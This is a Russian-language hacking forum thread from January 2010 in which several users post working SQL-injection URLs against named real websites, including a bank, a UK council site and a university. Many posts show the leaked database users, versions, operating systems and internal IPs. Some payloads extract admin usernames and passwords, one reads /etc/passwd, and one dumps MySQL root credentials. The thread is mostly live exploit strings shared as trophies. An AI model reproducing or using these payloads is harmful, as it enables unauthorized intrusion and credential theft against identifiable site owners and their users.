ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11381  
Старый 04.01.2010, 19:34
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

класичечкий вариант блокировался1!!
Цитата:
http://www.fiat.md/events/poln.php?id=20+or(1,2)=(select+count(*),concat(use r(),0x3a,database(),0x3a,version(),0x3a,@@version_ compile_os,floor(rand(0)*2))from(information_schem a.tables)+group+by+2)
8055@localhost:8055:5.0.77:redhat-linux-gnu1

Цитата:
http://smarthome.atto.ru/index.php?page=news&act=view&id=378+union+select+1 ,2,concat_ws(0x3a,user(),data base(),version(),@@version_compile_os),4,5--+
atto@localhost:atto_new:4.1.22-logortbld-freebsd6.2

Последний раз редактировалось Strilo4ka; 04.01.2010 в 20:41..
 
Ответить с цитированием

  #11382  
Старый 04.01.2010, 19:46
Аватар для cremator (c)
cremator (c)
Постоянный
Регистрация: 20.06.2008
Сообщений: 323
Провел на форуме:
1240829

Репутация: 165
Отправить сообщение для cremator (c) с помощью ICQ
По умолчанию

Цитата:
http://helpstudentam.ru/index.php?action=referats&cours=99+union+select+ve rsion()
Database Version: 5.0.81-community
Database name: murzifan_helpstudents
User name: murzifan_murzifa@localhost

Цитата:
http://www.mgounb.ru/?content=20'&folder=-1'+union+select+version()/*
Database Version: 4.0.15-nt
Database name: mgounb
User name: root@localhost

Последний раз редактировалось cremator (c); 04.01.2010 в 21:08..
 
Ответить с цитированием

  #11383  
Старый 05.01.2010, 14:01
Аватар для Jerri
Jerri
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
Провел на форуме:
2510517

Репутация: 334
Отправить сообщение для Jerri с помощью ICQ
По умолчанию

Код:
http://www.kuroed.com/?id=-1+and+1=1+union+select+1,2,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15+--+

kuroed@localhost
kuroed1db
4.1.22-log
portbld-freebsd6.3

 
Ответить с цитированием

  #11384  
Старый 05.01.2010, 20:19
Аватар для Ayowa
Ayowa
Новичок
Регистрация: 25.12.2009
Сообщений: 10
Провел на форуме:
76178

Репутация: 30
По умолчанию

MySQL 5:

www.johnsoncitypress.com
Код:
http://www.johnsoncitypress.com/News/article.php?ID=71327'+and+1=2+union+select+1,2,3,4,5,6,7,concat_ws(0x3b,user_name,user_password),9,10,11,12,13,14,15,16,17,18,19,20,21+from+ClinchFestStore.wp_users+limit+0,1+--+
www.sewe.com
Код:
http://www.sewe.com/gallery.php?id=9+and+1=2+union+select+1,2,3,4,5,6,7,group_concat%28column_name%29,9,10,11,12+from+information_schema.columns+where+table_name=0x7573657273+--+
www.365gunspor.com
Код:
http://www.365gunspor.com/unluler/picture.php?id=34%29+and+1=2+union+select+1,2,group_concat%28concat_ws%280x3a,userbane,password%29%29+from+sporadmin+--+
www.faithwriters.com
Код:
http://www.faithwriters.com/wc-article-editors-previous.php?id=31730%27+and+7=9+union+select+1,2,3,4,5,group_concat%28concat_ws%280x3a,username,password%29%29,7,8,9,10+from+adminpass+--+
www.talkofnewyork.com
Код:
http://www.talkofnewyork.com/cool2us/cool.php?ID=396+and+1=2+union+select+1,2,3,concat_ws%280x3a,id,username,password%29,5,6,7,8+from+admin+limit+0,1+--+
www.hoylegaming.com
Код:
http://www.hoylegaming.com/game.php?id=18+and+2=1+union+select+1,group_concat%28concat_ws%280x3a,username,password%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,77,88,99,20,21,22,23,24+from+admin_users+--+
soccerladuma.mobi
Код:
http://soccerladuma.mobi/news.php?id=21263+and+1=2+union+select+1,2,group_concat%28concat_ws%280x3a,fullname,email,passw,status%29%29,4,5,6,7,8+from+admin--
www.open.ac.uk
Код:
http://www.open.ac.uk/picetl/news/details/detail.php?itemId=496ddbbb661f5%27+and+1=2+union+select+1,2,3,4,5,6,concat_ws%28CHAR%2858,58%29,%20username,%20password%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+SecurityCmsUser+limit+0,1/*
www.rockfreaks.net
Код:
http://www.rockfreaks.net/index.php?page=albumreviews&id=-2398+union+select+1,table_schema,3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name=CHAR%2898,95,117,115,101,114,115%29
www.rmmedia.ru
Код:
http://www.rmmedia.ru/news.php?id=48+and+1=2+union+select+1,group_concat%28concat_ws%280x3a,username,password%29%29,3,4,5+from+admin_audioshare.administrators--
www.yourlistonline.com
Код:
http://www.yourlistonline.com/news.php?id=29%27+and+1=2+union+select+1,2,3,group_concat%28concat_ws%280x3a,userName,password%29%29,5,6+from+a_users+--+
www.milim.com
Код:
http://www.milim.com/news.php?id=100+and+1=2+union+select+1,2,3,4,5,6,group_concat%28concat_ws%280x3a,column_name%29%29,8+from+information_schema.columns+where+table_name=0x62625f7573657273+--+
www.cloudveil.com
Код:
http://www.cloudveil.com/company/news.php?id=50+and+1=11+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13+from+information_schema.tables+--+
www.darksidefreefly.com
Код:
http://www.darksidefreefly.com/news.php?id=3+and+1=2+union+select+1,2,3,4,5,group_concat%28table_name%29+from+information_schema.tables--
www.activeodds.info
Код:
http://www.activeodds.info/news.php?id=5445+and+1=2+union+select+1,2,group_concat%28table_name%29,4,5+from+information_schema.tables--
www.mikealstottfamilyfoundation.org
Код:
http://www.mikealstottfamilyfoundation.org/news.php?id=19%27+and+1=2+union+select+1,2,3,group_concat%28table_name%29,5,6,7,8+from+information_schema.tables+--+
MySQL 4:

www.cssdownunder.com
Код:
http://www.cssdownunder.com/site.php?id=345+and+1=2+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10+--+
epodsolar.com
Код:
http://epodsolar.com/site.php?id=340+and+1=2+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
 
Ответить с цитированием

  #11385  
Старый 06.01.2010, 03:33
Аватар для shell_c0de
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

Продолжаем традицию банков )
крупный Америкосовский банк
Код:
http://www.mcsbnh.com/about/news.php?id=-61+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5--
User: mcsbnhc_ensky@localhost
Version: 4.1.22-standard
Database: mcsbnhc_mcsb
OS: linux-gnu

Последний раз редактировалось shell_c0de; 06.01.2010 в 03:37..
 
Ответить с цитированием

  #11386  
Старый 07.01.2010, 14:34
Аватар для Ligendо
Ligendо
Новичок
Регистрация: 07.01.2010
Сообщений: 1
Провел на форуме:
30846

Репутация: 5
По умолчанию

Код:
http://www.lamsade.dauphine.fr/members.php?id_person=-151+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15--
Код:
http://www.budd-marseille.fr/news.php?ID=-13+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
Код:
http://www.avem.fr/news.php?id=-0148+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
4.0.25-standard-log:avemlfod:avemlfod@10.0.70.21

Код:
http://www.akata.fr/news.php?id=-449+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9

4.0.26-standard-log:akatav2:akatav2@10.0.62.107

Код:
http://www.lephotographe.fr/news/news.php?id=-232+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13--
lephotographe@tictac.priv:lephotographe:4.1.22-log
 
Ответить с цитированием

  #11387  
Старый 07.01.2010, 16:59
Аватар для dr.Pilulkin
dr.Pilulkin
Познающий
Регистрация: 03.06.2007
Сообщений: 44
Провел на форуме:
418827

Репутация: 48
По умолчанию

torreabbey@localhost:5.0.45:torreabbey
Код:
http://www.torre-abbey.org.uk/news.php?nID=-21+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4--
db_dentuser@lxplesk223:5.0.45:dentistry_content
Код:
http://www.dentistry.co.uk/news/news_detail.php?id=2434+limit+0+UnIon(SelecT+1,coNcaT_wS(0x3a,uSer(),VerSion(),daTaBase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26)+--+
nanoorg_news@localhost:5.0.83-log:nanoorg_news
Код:
http://www.nano.org.uk/news/index.php?article=-319+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
council@localhost:4.1.8-nt-max-log:dev_cms
Код:
http://www.thurrock.gov.uk/news/content.php?page=story'+limit+0+union+select+1,2,3,binary(concat_ws(0x3a,user(),version(),database())),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*&ID=3530
 
Ответить с цитированием

  #11388  
Старый 08.01.2010, 13:57
Аватар для DezMond™
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://thehamsterwheel.net
Код:
http://thehamsterwheel.net/game-reviews.php?id=-33'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
http://www.theatrealive.com.au
Код:
http://www.theatrealive.com.au/reviews.php?id=-476+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a3a,email,firstname,lastname,pwd,user_level),12,13,14,user(),16,17,18,19,20,21,22,23,24+from+users+where+user_level=1+limit+2,1+/*+
http://tformers.com
Код:
http://tformers.com/article.php?sid=-12873+union+select+1,2,3,concat_ws(0x3a3a,aid,name,email,pwd,radminsuper,user()),5,6,7,8,9,10,11,12+from+nuke_authors+where+radminsuper=1+limit+1,1+--+
www.gamesnewsi.com
Код:
http://www.gamesnewsi.com/reviews.php?op=showcontent&id=-751+union+select+1,2,3,concat_ws(0x3a3a,aid,name,email,pwd,radminsuper),5,6,7,8,9,10,11,12+from+nuke_authors+where+radminsuper=1+limit+5,1+--+
www.arscars.com
Код:
http://www.arscars.com/reviews.php?id=-6'+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(table_name)+from+information_schema.tables+--+
www.americandreamcomics.com
Код:
http://www.americandreamcomics.com/reviews.php?op=showcontent&id=-1105+union+select+1,2,3,concat_ws(0x3a3a,aid,name,email,pwd,radminsuper),5,6,7,8,9,10,11,12+from+nuke_authors+where+radminsuper=1+limit+0,1+--+
www.clubfandango.co.uk
Код:
http://www.clubfandango.co.uk/reviews.php?id=-2198+union+select+1,2,3,column_name,5,6,7,8+from+information_schema.columns+where+table_name=0x77705F7573657273+--+
beerdorks.com
Код:
http://beerdorks.com/reviews.php?rev_id=-484+union+select+1,2,concat_ws(0x3a3a,user_login,user_password),4,5,6,7,8,9,10,11,12,13+from+users+--+
www.hollies.co.uk
Код:
http://www.hollies.co.uk/review/reviewindex.php?menu=-2009+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+&st=1
benua.com.ua
Код:
http://benua.com.ua/reviews.php?id=-11+union+select+1,2,concat_ws(0x3a3a,login,pass,status),4+from+clients+--+
www.e-stat.info
Код:
http://www.e-stat.info/?cat=-16'+union+select+1,2,3,4,group_concat(table_name),6,7,8,9+from+information_schema.tables+group+by+table_schema+--+
www.beelingua.com
Код:
http://www.beelingua.com/reviews.php?id=-1+union+select+1,concat_ws(0x3a3a,id,l_user,l_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+l_admin+--+
www.best-savings-rates.com
Код:
http://www.best-savings-rates.com/reviews.php?id=-4+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,username,password),9,10,11,12+from+users+--+
www.winesellersltd.com
Код:
http://www.winesellersltd.com/reviews.php?id=-10+union+select+concat_ws(0x3a3a,user_name,password),2,3,4,5+from+users+limit+2,10+--+
www.the-junkyard.net
Код:
http://the-junkyard.net/reviews.php?action=viewreview&id=-32'+union+select+1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+users+limit+0,1+--+
www.surclaro.com
Код:
http://www.surclaro.com/reviews.php?op=showcontent&id=-7+union+select+1,2,3,4,5,6,7,8,9,10,11+/*+
www.hardwareheaven.com
Код:
http://www.hardwareheaven.com/reviews.php?reviewid=588&pageid=-1'+UnioN+SElect+1+from+authors+--+
www.metalfan.nl
Код:
http://www.metalfan.nl/reviews.php?id=-5491+union+select+1,concat_ws(0x3a3a,user_id,username,user_password,user_level)+from+mf_users+where+user_level=5+/*+
 
Ответить с цитированием

  #11389  
Старый 08.01.2010, 14:11
Аватар для Bb0y
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

MySQL 5.0.87-community-log
http://pravoinvest.com.ua/firm.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,group_concat(0x0b,column_nam e),24+from+information_schema.columns+where+table_ name=0x7573657273+--
users::user_id,user_login,user_password,user_descr iption,user_level
http://pravoinvest.com.ua/firm.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,group_concat(0x0b,user_id,0x 3a,user_login,0x3a,user_password),24+from+users+--
http://pravoinvest.com.ua:2082/login/
 
Ответить с цитированием

  #11390  
Старый 08.01.2010, 17:26
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Всем прив давно мну не было.Писали нет по стате хл но все равно осмелюсь.

Двиг HLstatsX Community Edition 1.6.5


http://hlstatsx.eu/hlstats.php?mode=dailyawardinfo&award=-99+union+select+1,2,concat_ws(0x3a,version(), user(),database()),4--&game=css

Version: 5.0.45-log
User: root@92.48.227.131
Database: hlstatsce


Читаем : etc/passwd

http://hlstatsx.eu/hlstats.php?mode=dailyawardinfo&award=-99+union+select+1,2,CONCAT(0x3a,LOAD_FILE(0x2F6574 632F706173737764), 0x3a),4--&game=css


с мускула root

http://hlstatsx.eu/hlstats.php?mode=dailyawardinfo&award=-99+union+select+1,2,concat_ws(0x3a,user,password), 4+from+mysql.user--&game=css


Если что извиняйте.

Последний раз редактировалось jokester; 08.01.2010 в 18:43.. Причина: хеши и пароли запрещены
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ